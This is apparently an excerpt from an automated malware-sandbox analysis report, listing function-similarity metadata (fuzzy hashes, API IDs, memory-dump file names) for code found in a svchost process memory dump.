• Opcode Fuzzy Hash: 6a2d2f89dbe45a9fea545bcb4aa06eef1d3c7bdcbbdd9a8edf910a903994b9b4
• Instruction Fuzzy Hash: 0C41A272225A408ADB61BF25F8443EA6BB0F398784F644031EE4E8B798EB3CC641D740
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2664314576.0000013DE2720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000013DE2720000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_13de2720000_svchost.jbxd
Similarity
• API ID: ExceptionFileHeaderRaise
• String ID: csm
• API String ID: 2573137834-1018135373
• Opcode ID: d7810ab3a0ec9818877cf1b3e283a106e6e962497adc233d094785ed36f44b7e
• Instruction ID: 8fa5da22416db5681e7117c4a4a9092644612ce5a02032eb9614756879cedc31
• Opcode Fuzzy Hash: d7810ab3a0ec9818877cf1b3e283a106e6e962497adc233d094785ed36f44b7e
• Instruction Fuzzy Hash: 5E113072219B8482EB61AF15F4402997BF4F788B94F584220DF8D0B754DF3DC651D704
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2664314576.0000013DE2720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000013DE2720000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_13de2720000_svchost.jbxd
Similarity
• API ID: Heap$Process$AllocFree
• String ID:
• API String ID: 756756679-0
• Opcode ID: 1e98e18f6346a7606d876eb22bc804523d63b476fed3d5047e07684f33477b56
• Instruction ID: c14f526e8716fda944a528217fc1074e69e92b4fded1d661f73d1f4e681b3129
• Opcode Fuzzy Hash: 1e98e18f6346a7606d876eb22bc804523d63b476fed3d5047e07684f33477b56
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 60118F76A02B4489EA05FB66B4042A96BB5FB89FC0F1C5034DE4D4B766DF38C682E300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2664314576.0000013DE2720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000013DE2720000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_13de2720000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$AllocProcess
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1617791916-0
                                                                                                                                                                                                                                                • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                                                                                                                                                                                • Instruction ID: 719f04b2e5cb3cbecb46ef11b107ba264e350dd03094814a390febef6ae71f12
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 19E06D35A016048AEB05AF62F80838A3BF1FB89F06F14C024CD090B351DF7D8699D750